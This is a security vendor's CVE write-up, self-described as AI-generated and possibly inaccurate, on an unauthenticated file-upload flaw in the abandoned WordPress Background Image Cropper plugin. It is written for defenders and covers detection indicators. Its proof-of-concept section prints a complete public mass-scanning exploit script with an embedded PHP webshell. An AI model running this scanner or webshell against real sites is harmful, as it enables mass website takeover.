ZeroPath at Black Hat USA 2026

WordPress Background Image Cropper CVE-2024-58348: Unauthenticated RCE via Unrestricted File Upload with Public Exploit and CISA KEV Listing

A brief summary of CVE-2024-58348, a critical unauthenticated remote code execution flaw in the abandoned WordPress Background Image Cropper plugin. Covers the public exploit, detection methods, CISA KEV inclusion, and the dual threat of direct exploitation and plugin name weaponization.

CVE Analysis

12 min read

ZeroPath CVE Analysis
ZeroPath CVE Analysis

2026-06-07

WordPress Background Image Cropper CVE-2024-58348: Unauthenticated RCE via Unrestricted File Upload with Public Exploit and CISA KEV Listing
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

An abandoned WordPress plugin with an unprotected file upload endpoint has been quietly exploited in the wild since at least October 2023, and it just landed on the CISA Known Exploited Vulnerabilities catalog. CVE-2024-58348 affects the WordPress Background Image Cropper plugin version 1.2, where the ups.php endpoint accepts arbitrary file uploads from unauthenticated users with zero validation, granting attackers trivial remote code execution on any site running the plugin.

The Background Image Cropper plugin was originally developed by Nick Halsey as a WordPress "feature plugin," a category of plugin designed to prototype functionality that might eventually be merged into WordPress core. It added cropping support for background images, providing parity with the header image cropping feature already present in WordPress. The plugin was published on WordPress.org in July 2015 and last updated in March 2020; it is now closed on WordPress.org and its GitHub repository has been archived.

What makes this vulnerability particularly noteworthy is not just the trivial exploitation path, but the convergence of three distinct risk factors: a publicly available mass scanning exploit that has been circulating for over two years, confirmed active exploitation prompting CISA KEV inclusion, and a secondary threat where attackers weaponize the plugin's name itself as camouflage for malware delivery in entirely separate attack chains.

Technical Information

Root Cause: CWE-434 Unrestricted File Upload

The vulnerability is classified under CWE-434 (Unrestricted Upload of File with Dangerous Type). The root cause is straightforward: the ups.php file located at /wp-content/plugins/background-image-cropper/ups.php renders an HTML file upload form and processes file submissions without implementing either of two critical security controls.

First, there is no authentication or authorization check. The endpoint is accessible to any visitor on the internet via a simple HTTP GET request. No WordPress session, nonce, or user capability is required. Second, there is no file type validation. The upload handler accepts any file regardless of MIME type, file extension, or content. PHP scripts are accepted and stored directly in the plugin directory, where they become immediately executable by the web server.

The upload form itself uses enctype="multipart/form-data" with the form attributes name="uploader" and id="uploader". The form contains a file input field named file and a submit button named _upl. When a file is submitted, it is written to the plugin directory without sanitization.

CVSS Scoring

The vulnerability carries a CVSS v3.1 score of 9.8 and a CVSS v4.0 score of 9.3, both rated CRITICAL. The scoring reflects the unauthenticated, network accessible, low complexity nature of the flaw with high impact across confidentiality, integrity, and availability.

MetricCVSS v3.1CVSS v4.0
Score9.8 (CRITICAL)9.3 (CRITICAL)
Attack VectorNetworkNetwork
Attack ComplexityLowLow
Privileges RequiredNoneNone
User InteractionNoneNone
Confidentiality ImpactHighHigh
Integrity ImpactHighHigh
Availability ImpactHighHigh

The CVSS v4.0 vector string assigned by VulnCheck (the CNA) is: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N.

Attack Flow

The exploitation proceeds in two stages:

Stage 1: Reconnaissance. The attacker sends an HTTP GET request to the target at /wp-content/plugins/background-image-cropper/ups.php. If the response contains the characteristic HTML upload form (specifically the string enctype="multipart/form-data" name="uploader" id="uploader"), the target is confirmed vulnerable.

Stage 2: Exploitation. The attacker sends an HTTP POST request to the same ups.php endpoint, attaching a malicious PHP file to the file multipart form data field. Because there is no file type validation, the PHP file is stored directly in the plugin directory on the server. The attacker then accesses the uploaded file directly via its URL (e.g., /wp-content/plugins/background-image-cropper/shell.php) to execute arbitrary operating system commands with the privileges of the web server process.

Mass Scanning Infrastructure

The publicly available exploit (EDB-51998) is not merely a proof of concept; it is a fully operational mass scanning tool. It uses a Python multiprocessing pool with 150 threads to rapidly scan lists of target URLs provided in an external text file. When a vulnerable endpoint is identified, the tool logs the full URL to a file named Shells.txt for subsequent manual exploitation. This design lowers the barrier to exploitation to near zero: an attacker needs only a list of WordPress sites and the ability to run a Python script.

Dual Threat: Plugin Name as Malware Camouflage

Beyond direct exploitation of the ups.php endpoint, threat actors have weaponized the plugin's name as a disguise for malware delivery. In July 2025, attackers exploited CVE-2025-5394 (a CVSS 9.8 arbitrary file upload vulnerability in the "Alone" WordPress theme) to install malicious ZIP archives named background-image-cropper.zip on victim sites. These archives contained PHP backdoors enabling remote command execution and further file uploads. Post exploitation, attackers deployed file managers and created rogue administrator accounts for complete site takeover. Wordfence reported blocking over 120,900 exploit attempts in this campaign, with active attacks beginning on July 12, 2025, two days before the Alone theme vulnerability was publicly disclosed.

This means that the presence of a background-image-cropper directory in a WordPress installation does not necessarily indicate the legitimate (but vulnerable) plugin. It may instead be a malicious package planted through an entirely different attack vector.

Proof of Concept

A fully functional Python exploit authored by Milad Karimi (Ex3ptionaL) is publicly available on Exploit-DB as EDB-51998, published on April 21, 2024. The NVD entry for CVE-2024-58348 directly references this Exploit-DB entry, confirming the mapping.

The exploit contains an embedded PHP webshell payload that uses php_uname() to reveal system information and the PHP copy() function to enable secondary arbitrary file uploads for post exploitation activities:

import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\\\') exit('\\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> [Succefully]' open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> [Succefully]' open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: print ' -| ' + url + ' --> [Failed]' except : print ' -| ' + url + ' --> [Failed]' mp = Pool(150) mp.map(FourHundredThree, target) mp.close() mp.join()

The exploit reads target URLs from a file, sends GET requests to the ups.php endpoint, checks for the characteristic upload form HTML, and logs vulnerable targets to Shells.txt. It uses a thread pool of 150 for concurrent scanning. The embedded webshell, once uploaded via the form, provides OS information disclosure and a secondary file upload capability for post exploitation.

Note the deliberately misspelled User-Agent string containing Mozlila (instead of Mozilla) and Moblie (instead of Mobile), which serves as a useful fingerprint for detection.

Detection Methods

While no formal Sigma rules, YARA rules, or IDS signatures have been published in public repositories for this specific CVE, the publicly available exploit code provides a rich set of indicators that defenders can operationalize.

Web Access Log Monitoring

The most direct detection approach is monitoring web server access logs for any HTTP requests targeting the path /wp-content/plugins/background-image-cropper/ups.php. This endpoint is not accessed during normal WordPress operations. Any request to this path, especially unauthenticated POST requests with a multipart/form-data content type, should be treated as highly suspicious and investigated immediately. If you use a WAF or reverse proxy, creating a rule to alert on or block traffic to this specific URI is strongly recommended.

User Agent String Indicators of Compromise

The publicly known exploit uses a distinctive, deliberately misspelled User-Agent header. Specifically, the string contains Mozlila (misspelling of "Mozilla") and Moblie (misspelling of "Mobile"). These typos are present in the exploit code published on Exploit-DB and can serve as reliable indicators of automated exploitation using this particular tooling. Searching web logs or configuring alerting rules for User-Agent strings containing either of these misspellings can help catch exploit attempts in progress.

Vulnerable Endpoint Fingerprinting

The ups.php endpoint, when accessed via GET, returns a characteristic HTML upload form. The response body contains telltale HTML attributes including name="uploader" id="uploader" and form input fields with name="file" and name="_upl". Defenders can use this fingerprint during proactive vulnerability scanning of their WordPress environments to determine if the vulnerable endpoint is exposed and responsive.

File Integrity Monitoring for Webshell Artifacts

Post exploitation, the attacker uploads a PHP webshell into the plugin directory. The known exploit payload writes a file containing the unique string Ex3ptionaL, as well as calls to php_uname() and the response string eXploiting Done. File Integrity Monitoring (FIM) should be configured on the WordPress wp-content/plugins/ directory tree. Any new or modified .php files appearing in wp-content/plugins/background-image-cropper/ after the initial plugin installation should trigger an alert. Scanning existing files for the strings Ex3ptionaL or eXploiting Done can reveal whether a system has already been compromised via this specific exploit chain.

Process and Network Behavior Monitoring

On the endpoint side, EDR solutions or host based monitoring should watch for unusual child process execution by the web server user (e.g., www-data or apache). If the uploaded webshell is used for further exploitation, you may observe the web server process spawning system shells or other unexpected commands. Network level monitoring for outbound connections initiated by the web server process, particularly to uncommon external IPs shortly after a POST to ups.php, can help identify post exploitation C2 activity.

Affected Systems and Versions

The vulnerability affects a single version and configuration:

  • Plugin: WordPress Background Image Cropper
  • Affected Version: 1.2 (the only known release)
  • Platform: PHP / WordPress
  • Vulnerable Endpoint: /wp-content/plugins/background-image-cropper/ups.php

The plugin was published on WordPress.org on July 14, 2015, and last modified on March 30, 2020. It is now closed on WordPress.org and its GitHub repository was archived on March 1, 2024. No patched version exists, and none will be released given the plugin's abandoned status.

Any WordPress installation with this plugin present in the wp-content/plugins/ directory is vulnerable, regardless of whether the plugin is activated or deactivated, because the ups.php endpoint is a standalone PHP file that does not depend on WordPress plugin activation hooks.

Additionally, defenders should be aware that malicious packages bearing the name background-image-cropper.zip have been distributed through entirely separate attack vectors (such as CVE-2025-5394 in the Alone WordPress theme). The presence of a background-image-cropper directory does not necessarily indicate the legitimate plugin; it may be a planted backdoor.

Vendor Security History

The Background Image Cropper plugin has no history of prior CVEs or security advisories, which is consistent with its status as a niche, low profile utility that received minimal security scrutiny during its active development period. The plugin author, Nick Halsey, is a WordPress core contributor, but this particular plugin was a side project that was never widely adopted.

The broader pattern here is characteristic of the WordPress plugin ecosystem: abandoned plugins with small user bases rarely receive security fixes, and the gap between public exploit availability and formal CVE assignment can span years. In this case, community reports of malware associated with the plugin name appeared on Reddit in October 2023, a public exploit was published on Exploit-DB in April 2024, and the CVE was not formally assigned until June 2026, a gap of over two years during which attackers had unrestricted access to a public exploit while defenders had no CVE identifier to track or remediate against.

Users in the WordPress.org support forum have posted topics titled "Background Image Cropper is a virus," reporting the plugin containing malicious code or being associated with malware campaigns. No vendor response was ever provided to these reports.

Threat Timeline

DateEvent
July 14, 2015Plugin published on WordPress.org by Nick Halsey
March 30, 2020Plugin last modified (final update)
October 2023wp-sec and background-image-cropper malware reported by WordPress administrators on Reddit
March 1, 2024GitHub repository archived
April 16, 2024Exploit authored by Milad Karimi (Ex3ptionaL)
April 21, 2024Exploit published on Exploit-DB (EDB-51998)
July 12, 2025Active attacks begin exploiting Alone theme to install malicious background-image-cropper.zip
June 1, 2026CVE-2024-58348 added to CISA KEV Catalog
June 7, 2026VulnCheck advisory published
June 8, 2026NVD publishes CVE-2024-58348

References

Detect & fix
what others miss

Works with
  • GitHub
  • GitLab
  • Bitbucket
  • Azure DevOps Services
  • Jira
  • Linear
  • Slack
  • Security Compass
Security magnifying glass visualization